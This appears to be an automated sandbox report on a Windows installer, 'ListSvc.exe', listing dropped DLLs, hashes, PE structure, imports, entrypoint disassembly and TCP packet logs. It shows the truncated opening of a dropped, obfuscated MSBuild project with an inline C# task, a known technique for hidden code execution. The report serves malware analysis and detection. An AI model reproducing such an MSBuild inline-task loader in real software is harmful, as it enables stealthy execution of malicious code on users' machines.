SSDEEP:	1536:DCYcjsWY5cdKXz6ZNJbSOaWvk0fqG73yfrcqOGO7AqEsysdW4kV+dB:Dnc2oK4D+WMrG7ieAqEsyMW9A
MD5:	0BBCCDDFF5124ED2C62F92BBEE5B7DC6
SHA1:	49F38B48A737810E36B36FA5E0EC88327F90BD38
SHA-256:	EC6332F693E8A14A6E87A99EB16434CF8014B42FD5713D2FBF96F8067DBD8C86
SHA-512:	000C0EB88BA1380365F6ACA187EC4DB5A87AAE07A93930FEC9D769A936228F6F11E81C0DBDAFA59FFB833B0BCBFBD9B124955C003B4CAE142886FFCE115BD28F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.PMo.>.o.>.o.>.o.?.8.>....j.>..0..f.>..0....>..0..w.>...=.~.>...;.y.>...:.`.>...7.n.>.....n.>...<.n.>.Richo.>.........PE..L...uv.\.........."!................0`.......................................P............@A.................................!..(....0..............."..0>...@.......Y..T............................Y..@............ ...............................text............................... ..`.data...$...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-V8V1C.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	995050
Entropy (8bit):	3.1455468631456025
Encrypted:	false
SSDEEP:	1536:D0bIbxbybnbeb5bbbzbhbfb1EyaB8J1zhz1tKHnCLQnMu+mP/5uGeLaeAEpjgyZe:octm7KFXHlrhS
MD5:	00FECA5191FF48C74192C719F7F8011A
SHA1:	1692160FEE1D7581715481C704E16004B5C02192
SHA-256:	CCC01534C2379A0B9F65674B2CC62BFC52B6A5AF3D027D33AC99165BC89ED26A
SHA-512:	F99EBB08F408190B373AD7F9006978CDEFF17CDB19363243D576536A7555AF77557CDAE8A3F3A4D9E6A5D787BA4ED2B3548D3AD2839E27AE3A3C0639D26FF734
Malicious:	false
Reputation:	unknown
Preview:	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">..<Target Name="RVsqtTlOUIlLCbKpjAcrwQlHGZRXNxb"><PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb wHwYaCdltSSIRAnUCnoFqyEwpxxWs="$(MSBuildProjectFullPath)" fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr="$(MSBuildToolsPath)"/>..</Target>..<UsingTask TaskName="PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"><ParameterGroup><wHwYaCdltSSIRAnUCnoFqyEwpxxWs ParameterType="System.String" Required="true" /><fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr ParameterType="System.String" Required="true" /></ParameterGroup><Task><Code Type="Class" Lang="cs">..<![CDATA[using System;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Diagnostics;using System.IO;us

C:\Users\user\AppData\Roaming\is-VLJFI.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23600
Entropy (8bit):	6.993037210115726
Encrypted:	false
SSDEEP:	384:nj+Pkt62WWIJlWKTjF0GftpBjjO1IPBc4HRN7DdjXlPHBlQ:n7t09+ig1IBBD1y
MD5:	B334E16E8196A9F8B1358AC7007CE702
SHA1:	919A913257773110B7AEEEFABD419BF974A6D818
SHA-256:	E859F2245D7CB5500F4239A2C95E23C81F92F44847E8723F328CDCF9C68439ED
SHA-512:	154F64BBDB3452C2EA569FC7EE395DC3AE365B05D33E7D519B85375B7760917041A8443AC1546E1729A78CDE0E7CE0681E6A95EA865CCD0928CFF0D509593997
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........'.m.t.m.t.m.t...t.m.tO..t.m.t.m.t.m.tO..t.m.tO..t.m.tO..t.m.t.?.t.m.t.?.t.m.t.?.t.m.t.?.t.m.tRich.m.t........PE..L.....}O...........!......................... ...............................P............@.............................5...t...<....0.. ...............0>...@..........................................@............................................text............................... ..`.data...\.... ......................@....rsrc... ....0......................@..@.reloc..X....@......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\webuser.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19328
Entropy (8bit):	6.44891297813936
Encrypted:	false
SSDEEP:	384:axu1O5OhXyeJE//9z9R3jxWPW2WqdHRN7ztjwuAzXulGswMx+Ty:Dhte3NTXQzUzrRTy
MD5:	175A0041323081BC33FE446C863AC2B1
SHA1:	CE4633101D44891507292681C30F06770C5C1057
SHA-256:	15B8B74FDC26321E64FFC48720A9607B1A4880ABDC87189E73FC1BF21A40BF65
SHA-512:	70691014E290526C5D6744555B6191A1BAAD2D9D7E403B02F0031C439E7589B916400F709E517C4ADF738E850185154F6A0B5334EA357E57BA60113A79F524BF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................v.....G.....G.....G.0.....G.....Rich............PE..L...G.._...........!.........................0...............................p............@A.........................#..T...\|@..P....P..`............(...#...`..P...p...T...............................@............@..x............................text............................... ..`.data........0......................@....idata.......@......................@..@.rsrc...`....P....... ..............@..@.reloc..P....`.......&..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\webuser4.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	564616
Entropy (8bit):	6.436029660287372
Encrypted:	false
SSDEEP:	6144:UAtPl0D3DxEx3J7Ug0nbfSvvE9P3htxISqw+89+e0SIGjBfr8UozXuRojQF:GPxEx3wO3GBISLjZjtoU
MD5:	BDB097F9A5E9025E97E4F3D0F0BB07EE
SHA1:	DCB972808A74251B2836E23D5F026C6DC6AC14C0
SHA-256:	6499A3B377CCE1AFAD924F15291F8913C5E30177392A0DFB605178FAD9954040
SHA-512:	3BF7A7101288632B9BB0ED4106A7E16BAB030759DEB889B8DD35C83A0E2FAC2D241FC6247179796A848F99CA841B33570CA2EF0930D5986E63CA2F6007E5C53B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b..!&.r&.r&.r...s".r...s..r...s!.r.s%.r.?r'.r.:r$.r...s4.r.8r,.r.=r-.r&.r..r.sG.r.s'.r.{r'.r.s'.rRich&.r........................PE..L...L.._...........!.....\...*......L........ ......................................Z.....@A.............................\|........... ..h;...........z...#...`..$b...j..T...............................@....................X.......................text....[.......\.................. ..`.data...hh...p...Z...`..............@....idata..V...........................@..@.didat..............................@....tls................................@....rsrc...h;... ...<..................@..@.reloc..$b...`...d..................@..B........................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	281
Entropy (8bit):	5.090282930140903
Encrypted:	false
SSDEEP:	6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+60i48VjK0W6s9dm:zK13I30ZMt9BFN+60Serpm
MD5:	163DF5C5CBC8BED81B5BF8E3F6D4C366
SHA1:	81B3AC5C70F44FFF89FDE2BCF7D19F9B64535D71
SHA-256:	9D4D9A328D4FE65497C6B3516762EE5347E431B343B8E63C690A970DC38AD8E8
SHA-512:	852C383EE6287C406D2A4AEF519E44504B0D1C70179FB5BFE8BCF499DCAD16410BC63B6374A083428FA3BA7E4CF27371B67188116A7808C907F5DBAA8E89DC8A
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Build user version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....Build started 10/13/2021 8:28:16 AM.....Build succeeded... 0 Warning(s).. 0 Error(s)....Time Elapsed 00:00:38.66..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.659551810121267
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	ListSvc.exe
File size:	2295403
MD5:	e16ddbbcdf1693d6fba70e92b140e8f7
SHA1:	c51278af66509cadd17bb99a1f83c962144c7adb
SHA256:	41e4a08b21bdfd7b06a90764d4636601a56e55f3fa82515d2599eabcd5dd9f68
SHA512:	ecc0b1ac818d0603ccc5edce0306375fee4aec85346f5010fdc4d7080086994ffbd9184382a4b4ffe0198d1c5e610ada72527225066c35c1dfcdf626dd877dc9
SSDEEP:	24576:K4nXubIQGyxbPV0db26BJWrSAtXgFWR0HFu4gOjb4LcvqQrckwF9ECIilWx5NprR:Kqe3f6GrIjQXOwLMcNy5NpQezuyS8bkK
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	00928e8e868eb000

Static PE Info

General
Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	5a594319a0d69dbc452e748bcf05892e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004B10F0h
call 00007F21D08D3685h
xor eax, eax
push ebp
push 004B65E2h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004B659Eh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004BE634h]
call 00007F21D0975DAFh
call 00007F21D0975902h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F21D08E90F8h
mov edx, dword ptr [ebp-14h]
mov eax, 004C1D84h
call 00007F21D08CE277h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004C1D84h]
mov dl, 01h
mov eax, dword ptr [004237A4h]
call 00007F21D08EA15Fh
mov dword ptr [004C1D88h], eax
xor edx, edx
push ebp
push 004B654Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F21D0975E37h
mov dword ptr [004C1D90h], eax
mov eax, dword ptr [004C1D90h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F21D097C41Ah
mov eax, dword ptr [004C1D90h]
mov edx, 00000028h
call 00007F21D08EAA54h
mov edx, dword ptr [004C1D90h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xf36	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0xe578	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22e4	0x244	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb361c	0xb3800	False	0.344863934105	data	6.35605820433	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	False	0.544921875	data	5.97275005522	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	False	0.360979352679	data	5.04440056201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0xbb000	0x6de8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xc2000	0xf36	0x1000	False	0.3681640625	data	4.89870464796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didata	0xc3000	0x1a4	0x200	False	0.345703125	data	2.75636286825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.edata	0xc4000	0x9a	0x200	False	0.2578125	data	1.87222286659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xc6000	0x5d	0x200	False	0.189453125	data	1.38389437522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0xe578	0xe600	False	0.140625	data	4.16427223294	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc7588	0x8db	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0xc7e64	0x4228	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xcc08c	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xce634	0x1a68	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xd009c	0x10a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xd1144	0x988	data	English	United States
RT_ICON	0xd1acc	0x6b8	data	English	United States
RT_ICON	0xd2184	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xd25ec	0x360	data
RT_STRING	0xd294c	0x260	data
RT_STRING	0xd2bac	0x45c	data
RT_STRING	0xd3008	0x40c	data
RT_STRING	0xd3414	0x2d4	data
RT_STRING	0xd36e8	0xb8	data
RT_STRING	0xd37a0	0x9c	data
RT_STRING	0xd383c	0x374	data
RT_STRING	0xd3bb0	0x398	data
RT_STRING	0xd3f48	0x368	data
RT_STRING	0xd42b0	0x2a4	data
RT_RCDATA	0xd4554	0x10	data
RT_RCDATA	0xd4564	0x2c4	data
RT_RCDATA	0xd4828	0x2c	data
RT_GROUP_ICON	0xd4854	0x76	data	English	United States
RT_VERSION	0xd48cc	0x584	data	English	United States
RT_MANIFEST	0xd4e50	0x726	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x454060
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Version Infos

Description	Data
LegalCopyright
FileVersion
CompanyName	ListSvc
Comments	This installation was built with Inno Setup.
ProductName	ListSvc
ProductVersion	1.4
FileDescription	ListSvc Setup
OriginalFileName
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 08:27:14.077469110 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.077502966 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.077563047 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.077581882 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.077872038 CEST	49701	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.078560114 CEST	49701	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.078582048 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.078594923 CEST	49701	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.078602076 CEST	443	49701	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.177442074 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.177480936 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.177586079 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.178133011 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.178174973 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.178566933 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.178596973 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.178678989 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.179090023 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.179127932 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.179223061 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.179436922 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.179451942 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.179640055 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.179660082 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.263226986 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.264492035 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.264528990 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.265306950 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.266071081 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.266083002 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.266149998 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.266158104 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.266805887 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.266839981 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.267698050 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.267712116 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.267760038 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.267771006 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.423423052 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.423460960 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.423528910 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.423549891 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.423578024 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.423620939 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.424037933 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.424052954 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.424062014 CEST	49703	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.424067020 CEST	443	49703	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.433664083 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.433697939 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.433765888 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.433902025 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.434042931 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.434520960 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.434551954 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.434564114 CEST	49702	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.434572935 CEST	443	49702	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.437648058 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.437685966 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.437839031 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.438411951 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.438435078 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.467166901 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.467216015 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.467325926 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.467653036 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.467665911 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.528848886 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.530045986 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.530097961 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.531297922 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.531316042 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.531567097 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.531586885 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.553837061 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.555938005 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.555960894 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.555969000 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.555975914 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.555983067 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.555989027 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.681411028 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.681432962 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.681483984 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.681689978 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.682071924 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.682107925 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.682122946 CEST	49705	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.682136059 CEST	443	49705	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.689502001 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.690555096 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.690587997 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.698848963 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.698870897 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.698893070 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:14.698905945 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:14.711698055 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.711729050 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.711771011 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.711841106 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.712053061 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.712591887 CEST	49706	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.712610960 CEST	443	49706	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.749759912 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.749815941 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.749958038 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.750205040 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.750236034 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.840172052 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.841392040 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.841435909 CEST	443	49707	20.190.160.129	192.168.2.6
